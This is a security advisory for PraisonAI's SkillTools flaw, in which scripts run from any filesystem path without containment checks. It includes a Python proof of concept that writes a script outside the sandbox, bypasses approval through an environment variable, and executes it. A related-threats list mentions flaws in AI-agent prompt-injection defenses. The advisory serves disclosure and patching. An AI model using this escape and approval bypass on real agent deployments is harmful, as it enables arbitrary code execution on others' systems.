PraisonAI: SkillTools Executes Scripts Without Path Containment Validation
Description
### Summary `SkillTools.run_skill_script()` accepts a `script_path` parameter and executes it via `subprocess.run()` without any path containment validation. While `FileTools` has `_validate_path()` with traversal detection, `SkillTools` performs none. An LLM-directed call can execute arbitrary scripts from any filesystem location. The `@require_approval` decorator can be bypassed via YAML `approve:` for high-risk tools. ### Details `src/praisonai-agents/praisonaiagents/tools/skill_tools.py` (lines 69-119): ```python def run_skill_script(self, script_path: str, ...): script_path = os.path.expanduser(script_path) if not os.path.isabs(script_path): script_path = os.path.join(self._working_directory, script_path) script_path = os.path.abspath(script_path) if not os.path.exists(script_path): return f"Error: Script not found at {script_path}" # No path traversal check, no containment validation # Directly executes whatever is at that path: result = subprocess.run(cmd, ...) ``` By contrast, `FileTools._validate_path()` (`src/praisonai-agents/praisonaiagents/tools/file_tools.py`, lines 42-78) properly validates that the resolved path stays within the working directory: ```python def _validate_path(self, filepath: str) -> str: # ... cwd = os.path.abspath(os.getcwd()) if os.path.commonpath([absolute, cwd]) != cwd: raise ValueError(f"Path traversal detected: {filepath} escapes workspace {cwd}") ``` `SkillTools` has no equivalent check. ### PoC ```python import os, tempfile from praisonaiagents.tools.skill_tools import SkillTools # Create a "safe" working directory (the jail) jail = tempfile.mkdtemp(prefix="skill_jail_") # Create a malicious script OUTSIDE the jail attack_script = os.path.join(tempfile.gettempdir(), "malicious_skill.sh") with open(attack_script, 'w') as f: f.write("#!/bin/bash\n") f.write("echo \"PROOF_OF_EXPLOIT: Script executed outside jail\"\n") f.write("echo \"USER: $(whoami)\"\n") f.write("echo \"HOSTNAME: $(hostname)\"\n") os.chmod(attack_script, 0o755) # Bypass approval (simulates Docker env or YAML approve:) os.environ["PRAISONAI_AUTO_APPROVE"] = "true" st = SkillTools() st._working_directory = jail # Pretend we're confined # Run script from OUTSIDE the jail — no path validation! result = st.run_skill_script(attack_script) print(result) # Output: # PROOF_OF_EXPLOIT: Script executed outside jail # USER: anushkavirgaonkar # HOSTNAME: Anushkas-MacBook-Pro-2.local # Cleanup del os.environ["PRAISONAI_AUTO_APPROVE"] os.unlink(attack_script) os.rmdir(jail) ``` **Tested result:** The script at `/tmp/malicious_skill.sh` executed successfully despite the working directory being set to a jail directory. The output confirms arbitrary script execution including `whoami` and `hostname`. No path containment check exists — the absolute path is accepted and executed directly. ### Impact - **Arbitrary script execution**: Run any script on the filesystem from any location - **Chaining with file write**: Write a malicious script via `write_file` (YAML-approvable as a high-risk tool), then execute it via `run_skill_script` - **Root-level impact in Docker**: All PraisonAI Docker containers run as root (no `USER` directive), so an escaped script runs with full root privileges
CVSS v3.1 base metrics
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:NHigh severity
Band computed from the CVSS base score, not the source's own label — so it means the same thing across every feed.
AV
Network
Attack Vector
AC
Low
Attack Complexity
PR
Low
Privileges Required
UI
None
User Interaction
S
Unchanged
Scope
C
High
Confidentiality
I
High
Integrity
A
None
Availability
Affected
- Vendor
- PyPI
- Product
- praisonaiagents
Versions
- pkg:pypi/praisonaiagents < 1.6.78
Stated as the source expressed them.
References
- advisoryOSV GHSA-c44f-37qr-gw3fhttps://osv.dev/vulnerability/GHSA-c44f-37qr-gw3f
- otherOSV webhttps://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-c44f-37qr-gw3f
- advisoryOSV advisoryhttps://nvd.nist.gov/vuln/detail/CVE-2026-61443
- advisoryOSV advisoryhttps://nvd.nist.gov/vuln/detail/CVE-2026-62168
- vendorOSV packagehttps://github.com/MervinPraison/PraisonAI
- otherOSV webhttps://www.vulncheck.com/advisories/praisonai-before-remote-code-execution-via-skilltools
Related threats
same CWE or vendorCVE-2026-84275 — IBM Guardium Data Protection 12.2 is vulnerable to path traversal in the GIM file-upload functionality.
CVE-2026-84275 · 2h ago
CVE-2026-106126 — A command injection vulnerability in the Active Directory Events Listener of Tenable Identity Exposure (SaaS) allows an authenticated, low-privileg…
CVE-2026-106126 · 2h ago
PraisonAI: Prompt-injection defense blocks only when 3+ detector families fire simultaneously; realistic single-vector injections pass through unblocked
CVE-2026-60086 · 3h ago
PraisonAI: API deploy code generator embeds unescaped YAML fields into Python source
CVE-2026-61433 · 3h ago
PraisonAI: Call API localhost-only authentication bypass via spoofed Host header
CVE-2026-61435 · 3h ago
CVE-2026-84278 — IBM Guardium Data Protection 12.2 is affected by a command injection vulnerability in the SUID-root ssh_config_wrapper component.
CVE-2026-84278 · 3h ago